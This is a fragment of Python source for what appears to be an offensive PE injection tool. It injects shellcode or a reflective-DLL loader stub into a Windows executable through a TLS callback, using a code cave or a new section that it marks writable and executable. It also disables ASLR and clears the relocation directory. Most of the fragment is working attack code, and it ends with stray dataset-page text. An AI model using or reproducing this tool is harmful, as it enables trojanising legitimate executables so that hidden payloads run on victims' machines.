binary = inject_shellcode(binary,shellcode,raw_offset)
print colors.GREEN + "[+] Code cave injected" + colors.RESET
pe = pefile.PE(data=binary)
for n in pe.sections:
if n.VirtualAddress == codecaves[0].VirtualAddress:
n.Characteristics = 0xE0000020
print colors.GREEN + "[+] Characteristics of %s changed to 0xE0000020" % (codecaves[0].Name) + colors.RESET
break
update_tls_structure(rva,pe)
# Not code caves found
else:
section_manage(pe, shellcode)
# DIRECTORY_ENTRY_TLS present
else:
print colors.FAIL + "[-] The binary does already have the TLS Directory. I will be updated soon ..." + colors.RESET
# disable ASLR
pe.OPTIONAL_HEADER.DllCharacteristics &= ~pefile.DLL_CHARACTERISTICS['IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE']
if reloc and pe.OPTIONAL_HEADER.DATA_DIRECTORY[5].VirtualAddress != 0x0:
pe.OPTIONAL_HEADER.DATA_DIRECTORY[5].VirtualAddress = 0x0
pe.OPTIONAL_HEADER.DATA_DIRECTORY[5].Size = 0x0
print colors.GREEN + "[+] IMAGE_DIRECTORY_ENTRY_BASERELOC set to 0x0"
print colors.ORANGE + " VirtualAddress: 0x%x" % pe.OPTIONAL_HEADER.DATA_DIRECTORY[5].VirtualAddress
print colors.ORANGE + " Size: 0x%x" % pe.OPTIONAL_HEADER.DATA_DIRECTORY[5].Size + colors.RESET
return pe
section = False
reloc = False
def main(argv):
dll = False
try:
opts, args = getopt.getopt(sys.argv[1:],"rto:f:s:hl:")
except getopt.GetoptError as err:
print colors.FAIL + "Error: %s. Type -h for help" % (str(err)) + colors.RESET
sys.exit(1)
for opt, arg in opts:
if opt in ("-h","--help"):
usage()
sys.exit(1)
elif opt in ("-f"):
binary = open_file(arg,"rb")
elif opt in ("-l"):
dll = arg
elif opt in ("-o"):
output = arg
elif opt in ("-t"):
global section
section = True
elif opt in ("-r"):
global reloc
reloc = True
elif opt in ("-s"):
shellcode = open_file(arg,"rb")
if 'binary' not in locals():
usage()
sys.exit(1)
if 'shellcode' not in locals() and not dll:
print colors.FAIL + "[!] You must supply a shellcode file or the LoadLibrary payload\n" + colors.RESET
sys.exit(1)
banner()
if dll:
loader = "\x4D\x5A\xE8\x00\x00\x00\x00\x5B\x52\x45\x55\x89\xE5\x81\xC3\xEF\xBE\xAD\xDE\xFF\xD3\xC2\x0C\x00"
dll = pefile.PE(dll)
addr = dll.get_offset_from_rva(dll.DIRECTORY_ENTRY_EXPORT.symbols[0].address)
addr = addr - 7
addr = struct.pack("<I", addr)
loader = loader.replace("\xEF\xBE\xAD\xDE", addr)
size = len(loader)
shellcode = loader + dll.__data__[size:]
pe = inject_tls(binary,shellcode)
if 'output' not in locals():
output = "tls_injected.exe"
pe.write(filename=output)
print colors.BOLD + "[+] Injection completed: %s (%d bytes)" % (output,os.path.getsize(output)) + colors.RESET
if __name__ == '__main__':
main(sys.argv[1:])
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.